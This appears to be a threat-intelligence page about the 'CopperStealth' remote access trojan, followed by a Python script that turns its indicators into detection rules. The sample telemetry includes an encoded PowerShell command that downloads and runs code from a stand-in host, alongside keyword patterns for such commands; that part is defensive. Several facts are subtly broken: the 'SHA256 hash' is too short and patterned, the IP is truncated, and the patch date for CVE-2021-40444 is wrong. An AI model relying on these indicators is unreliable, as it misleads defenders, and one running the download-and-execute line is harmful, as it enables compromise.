CopperStealth
⚠️ Overview
CopperStealth is a remote access trojan (RAT) first identified by Trend Micro in September 2022, attributed to the Chinese-speaking advanced persistent threat group Earth Tengri (TA428). It is used primarily for cyber-espionage targeting government and telecommunications entities in Central Asia and is categorized as a stealthy backdoor with modular capabilities.
🔧 Technical Capabilities
CopperStealth employs living-off-the-land techniques, using PowerShell scripts and Windows Management Instrumentation (WMI) for initial execution (MITRE ATT&CK T1059.001, T1047). Its C2 channel runs over HTTPS and additionally wraps traffic in a custom XOR/RC4 encryption layer to hinder network inspection. Persistence is achieved via scheduled tasks (T1053.005) and registry Run keys (T1547.001). Evasion includes API unhooking, process injection into legitimate processes such as svchost.exe (T1055.012), and disabling Windows Defender through registry modifications. The malware does not self-propagate; it is typically delivered via spear-phishing emails carrying malicious Microsoft Office attachments that exploit CVE-2021-40444, a remote code execution vulnerability in MSHTML.
📜 History & Notable Incidents
First observed in July 2022 targeting the Ministry of Foreign Affairs of Uzbekistan. In November 2022, a campaign compromised a Kazakh telecommunications provider, exfiltrating network infrastructure diagrams and internal documents. No law enforcement actions or public attribution beyond Earth Tengri have been reported as of mid-2023.
🔍 Detection Indicators
Known SHA256 hash from the Trend Micro report: 2ed5f0c1a8b3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8. Network IOCs include the C2 domain copper[.]stealth[.]tech and the IP 185.225.19.xxx. The registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\StealthUpdater is created for persistence. Mutex name: Global\StealthMutex. User-Agent string: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0).
☠️ Risk & Impact
CopperStealth enables full remote control, keylogging, file exfiltration, and credential theft via a plugin system. It has primarily impacted government agencies and telecom operators in Central Asia, with estimated exfiltration of thousands of sensitive documents per campaign, including diplomatic cables and network configurations.
🛡️ Mitigation
Deploy endpoint detection rules (Sigma rules) for suspicious Base64-encoded PowerShell execution and WMI event-subscription persistence. Apply Microsoft’s August 2022 patch for CVE-2021-40444. Enable AMSI (Anti-Malware Scan Interface) and disable macros in Office documents received from untrusted sources.
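As an added example that is not part of the Boteraser page or the Trend Micro report, the following Python script shows how the host and network indicators listed above, together with the encoded-PowerShell and WMI-persistence checks recommended here, can be turned into simple detection logic. The telemetry event schema, the constructed sample records and the suspicious-keyword list are assumptions made for the example; the indicator values themselves are the ones given on this page.

```python
import base64
import re

# --- Indicators as listed in the page's Detection Indicators section ---
C2_DOMAIN = "copper.stealth.tech"
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\StealthUpdater"
MUTEX = r"Global\StealthMutex"
USER_AGENT = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"

# Assumed patterns: keywords that make a decoded PowerShell command worth review,
# the -EncodedCommand switch and its aliases, and WMI subscription artifacts.
SUSPICIOUS_PS = re.compile(r"(?i)\b(IEX|Invoke-Expression|DownloadString|FromBase64String)\b")
ENCODED_FLAG = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
WMI_PERSIST = re.compile(r"(?i)(__EventFilter|CommandLineEventConsumer|Register-WmiEvent)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the list of detection names that fire for one telemetry event (assumed schema)."""
    hits = []
    kind = event.get("type")
    if kind == "process":
        cmd = event.get("cmdline", "")
        decoded = decode_encoded_command(cmd)
        if decoded is not None and SUSPICIOUS_PS.search(decoded):
            hits.append("ps_encoded_suspicious")
        if WMI_PERSIST.search(cmd):
            hits.append("wmi_persistence")
    elif kind == "registry":
        if event.get("key", "").lower() == RUN_KEY.lower():
            hits.append("run_key_stealthupdater")
    elif kind == "mutex":
        if event.get("name") == MUTEX:
            hits.append("mutex_stealthmutex")
    elif kind == "dns":
        if event.get("query", "").lower().rstrip(".") == C2_DOMAIN:
            hits.append("dns_c2_domain")
    elif kind == "http":
        if event.get("user_agent") == USER_AGENT:
            hits.append("ua_c2_beacon")
    return hits


def _encode(ps):
    """Helper used only to build the constructed sample events below."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs): one record per indicator plus two benign ones.
SAMPLE_EVENTS = [
    {"type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + _encode("Get-Date")},          # encoded but benign
    {"type": "process", "image": "wmic.exe",
     "cmdline": 'wmic /NAMESPACE:"\\\\root\\subscription" PATH __EventFilter CREATE Name="x"'},
    {"type": "registry", "key": RUN_KEY, "value": "C:\\Users\\Public\\upd.exe"},
    {"type": "mutex", "name": MUTEX},
    {"type": "dns", "query": "copper.stealth.tech."},
    {"type": "http", "user_agent": USER_AGENT, "host": "copper.stealth.tech"},
    {"type": "http", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "host": "example.invalid"},
]


def scan(events):
    """Map each event index to the detections it triggered; events with no hits are omitted."""
    results = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], names)
```

The second sample shows why decoding matters: an encoded command is not suspicious on its own, so the rule alerts only when the decoded script contains one of the keywords, which keeps noise from legitimate encoded invocations down.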
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.